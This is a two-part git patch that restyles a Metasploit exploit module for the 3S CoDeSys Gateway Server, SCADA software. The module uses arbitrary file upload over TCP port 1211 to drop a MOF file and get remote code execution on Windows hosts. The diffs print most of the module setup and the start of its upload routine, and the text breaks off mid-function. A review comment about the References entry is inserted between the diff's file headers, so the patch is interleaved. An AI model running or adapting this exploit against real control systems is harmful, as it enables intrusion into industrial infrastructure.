From 437d6d6ba6e191a2db82e22b6f6c5363a7f82a34 Mon Sep 17 00:00:00 2001
From: "Enrique A. Sanchez Montellano"
Date: Wed, 6 Mar 2013 10:44:29 -0800
Subject: [PATCH 1/2] Fixed EOL, bad indent, added header, removed #!/usr/env/ruby
---
.../codesys_gateway_server_remote_execution.rb | 13 +++----------
1 file changed, 3 insertions(+), 10 deletions(-)
diff --git a/modules/exploits/windows/scada/codesys_gateway_server_remote_execution.rb b/modules/exploits/windows/scada/codesys_gateway_server_remote_execution.rb
index 05c318e378..f849684d04 100644
--- a/modules/exploits/windows/scada/codesys_gateway_server_remote_execution.rb
+++ b/modules/exploits/windows/scada/codesys_gateway_server_remote_execution.rb
@@ -18,18 +18,17 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ - 'Aaron Portnoy ', 'Enrique Sanchez ' - ], + ], 'License' => 'MSF_LICENSE', 'References' => [ - ['Exodus Intel Training', '02-2013'] + ['ICSA-13-050-01', '02-19-2013'] ], 'Platform' => 'win', 'Targets' => [ - ['Windows Universal', { }] + ['Windows Universal S3 CoDeSyS < 2.3.9.27', { }] ], 'DefaultTarget' => 0 ))
@@ -77,12 +76,6 @@ class Metasploit3 < Msf::Exploit::Remote print_status("File uploaded") end - def remove_file - end - - def read_file - end - def exploit print_status("- Attempting to communicate with SCADA system #{rhost} on port #{rport}")
From aa5c9461aef6e667467af69f82e5ffbef3eb5fb9 Mon Sep 17 00:00:00 2001
From: "Enrique A. Sanchez Montellano"
Date: Wed, 6 Mar 2013 10:50:31 -0800
Subject: [PATCH 2/2] Fixed more styling issues, EOL, tabs and headers
---
...codesys_gateway_server_remote_execution.rb | 199 +++++++++---------
1 file changed, 101 insertions(+), 98 deletions(-)
diff --git a/modules/exploits/windows/scada/codesys_gateway_server_remote_execution.rb b/modules/exploits/windows/scada/codesys_gateway_server_remote_execution.rb
index f849684d04..d728af5ba3 100644
--- a/modules/exploits/windows/scada/codesys_gateway_server_remote_execution.rb
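Review bot: The new `'References'` entry in the `@@ -18,18 +18,17 @@` hunk of patch 1/2, `['ICSA-13-050-01', '02-19-2013']`, puts the advisory ID in the reference-type slot and a date in the identifier slot, so it will most likely not resolve to a link the way `CVE`, `OSVDB` or `URL` entries do. I would write it as `['URL', '<URL of ICS-CERT advisory ICSA-13-050-01>']` (placeholder, the URL is not on this page) and add the CVE entry if one was assigned, so that anyone reading the module can trace it to the advisory and the fixed version. The new target name spells the vendor `S3 CoDeSyS`, while the module's own `'Name'` uses `3S CoDeSys`; `['Windows Universal 3S CoDeSys < 2.3.9.27', { }]` would keep the two consistent. Both lines appear to be carried over unchanged into the re-indented hunk of patch 2/2, and the `initialize` call they belong to starts outside this hunk.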
+++ b/modules/exploits/windows/scada/codesys_gateway_server_remote_execution.rb 
@@ -1,102 +1,105 @@ -#!/usr/bin/env ruby - +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com +## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote - - Rank = ExcellentRanking - include Msf::Exploit::EXE - include Msf::Exploit::FileDropper - include Msf::Exploit::Remote::Tcp - include Msf::Exploit::WbemExec - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'SCADA 3S CoDeSys Gateway Server Remote Execution', - 'Description' => %q{ - This module exploits arbitrary file creation to execute a mof file - gaining remote execution within the SCADA system - }, - 'Author' => - [ - 'Enrique Sanchez ' - ], - 'License' => 'MSF_LICENSE', - 'References' => - [ - ['ICSA-13-050-01', '02-19-2013'] - ], - 'Platform' => 'win', - 'Targets' => - [ - ['Windows Universal S3 CoDeSyS < 2.3.9.27', { }] - ], - 'DefaultTarget' => 0 - )) - - register_options( - [ - Opt::RPORT(1211), - ], self.class - ) - end - - def check - return Exploit::CheckCode::Vulnerable - end - ## - # upload_file(remote_filepath, remote_filename, local_filedata) - # - # remote_filepath: Remote filepath where the file will be uploaded - # remote_filename: Remote name of the file to be executed ie. 
boot.ini - # local_file: File containing the read data for the local file to be uploaded, actual open/read/close done in exploit() - - def upload_file(remote_filepath, remote_filename, local_filedata = null) - magic_code = "\xdd\xdd" - opcode = [6].pack('L') - - # We create the filepath for the upload, for execution it should be \windows\system32\wbem\mof\ 'SCADA 3S CoDeSys Gateway Server Remote Execution', + 'Description' => %q{ + This module exploits arbitrary file creation to execute a mof file + gaining remote execution within the SCADA system + }, + 'Author' => + [ + 'Enrique Sanchez ' + ], + 'License' => 'MSF_LICENSE', + 'References' => + [ + ['ICSA-13-050-01', '02-19-2013'] + ], + 'DisclosureDate' => 'Feb 02 2013', + 'Platform' => 'win', + 'Targets' => + [ + ['Windows Universal S3 CoDeSyS < 2.3.9.27', { }] + ], + 'DefaultTarget' => 0)) + + register_options( + [ + Opt::RPORT(1211), + ], self.class) + end + + def check + return Exploit::CheckCode::Vulnerable + end + + ## + # upload_file(remote_filepath, remote_filename, local_filedata) + # + # remote_filepath: Remote filepath where the file will be uploaded + # remote_filename: Remote name of the file to be executed ie. boot.ini + # local_file: File containing the read data for the local file to be uploaded, actual open/read/close done in exploit() + + def upload_file(remote_filepath, remote_filename, local_filedata = null) + magic_code = "\xdd\xdd" + opcode = [6].pack('L') + + # We create the filepath for the upload, for execution it should be \windows\system32\wbem\mof\